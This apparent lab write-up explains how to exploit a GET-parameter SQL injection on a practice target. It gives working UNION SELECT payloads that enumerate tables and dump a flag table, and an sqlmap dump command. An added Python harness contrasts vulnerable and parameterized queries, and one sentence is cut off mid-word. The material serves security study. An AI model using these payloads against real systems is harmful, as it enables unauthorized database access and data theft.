Because the original text already states that the injection is via GET, we start injecting directly; if you still need to confirm that an injection point exists, you can use the usual tests of appending ' and of appending and 1=1 and comparing the page's response.
Two methods of performing the SQL injection
① Manual SQL injection
First, try the ' test to see whether an error page is returned; if it is, treat the injection as character (string) injection (with integer injection the page is displayed normally).
Second, since this is character injection, the single quotation mark must be closed, that is, construct ' -- '. Here -- comments out the operator that follows (the trailing quote added by the application), which is what makes the character injection work.
Third, construct the statements for injection:
' order by 4 -- '//use the returned page to judge how many columns there are: with by 4 the page is normal, with 5 it errors, so there are 4 columns (fields)
' union select 1,2,user(),database() -- '//dump the current database and user name
//read the data tables in the database
' union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='pentesterlab' limit 0,19 -- '//out of personal habit, since I don't know exactly how many there are, I read several tables at once; note that only in the where clause is s
Read the fields (columns) of the data table:
' union select 1,2,COLUMN_NAME,4 from information_schema.COLUMNS where TABLE_SCHEMA='pentesterlab' and TABLE_NAME='flag' limit 0,19 -- '
Dump the data from the flag table:
' union select 1,flag,3,4 from pentesterlab.flag -- '
The second method refines the structure: it uses group_concat() together with a where clause to build the query, then dumps the data tables in one request.
' union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database() -- '
Dump the fields of the flag table:
' union select group_concat(column_name),2,3,4 from information_schema.columns where table_name= 'flag' -- '
Dumping the flag value itself is the same as in the first method.
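As an added illustration (not part of the original write-up), the following Python harness shows why the steps above work and how parameterized queries stop them. A constructed in-memory SQLite database stands in for the lab's pentesterlab.flag table (an assumption, not the real schema), and the same inputs are run through a string-concatenated query and a bound-parameter query.

```python
import sqlite3

# Constructed stand-in for the lab database (assumption, not the real pentesterlab schema):
# a 4-column 'users' table queried by the page, and a 'flag' table holding the secret.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, name TEXT, role TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'alice', 'user', 'alice@example.test');
        CREATE TABLE flag(flag TEXT);
        INSERT INTO flag VALUES ('FLAG{constructed-sample}');
    """)
    return conn

def lookup_vulnerable(conn, name):
    # Vulnerable: the input is concatenated inside single quotes, so a quote in the
    # input closes the literal and '-- ' comments out the trailing quote (character injection).
    sql = "SELECT id, name, role, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, name):
    # Hardened: a bound parameter is never parsed as SQL, so the same input stays a plain string.
    sql = "SELECT id, name, role, email FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()

def probe(conn, payload):
    """Run an input against the vulnerable query and report what the page would show:
    ('rows', rows) for a normal page, ('error', message) for the error page that the
    write-up uses to detect character injection and to count columns with ORDER BY."""
    try:
        return ("rows", lookup_vulnerable(conn, payload))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    db = make_db()
    for p in ["alice'", "' order by 4 -- ", "' order by 5 -- ",
              "' union select 1,flag,3,4 from flag -- "]:
        print(repr(p), "-> vulnerable:", probe(db, p))
        print("      parameterized:", lookup_safe(db, p))
```

The parameterized version returns no rows for every payload, which is the fix to apply in the application rather than filtering the input.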
② Using sqlmap for injection (because injecting with sqlmap is relatively simple, there is no screenshot here, just the command itself)
//dump the flag directly
sqlmap -u http://192.168.18.131/pentest/test/sqli/sqltamp.php?gid=1 -D pentesterlab -T flag -C flag --dump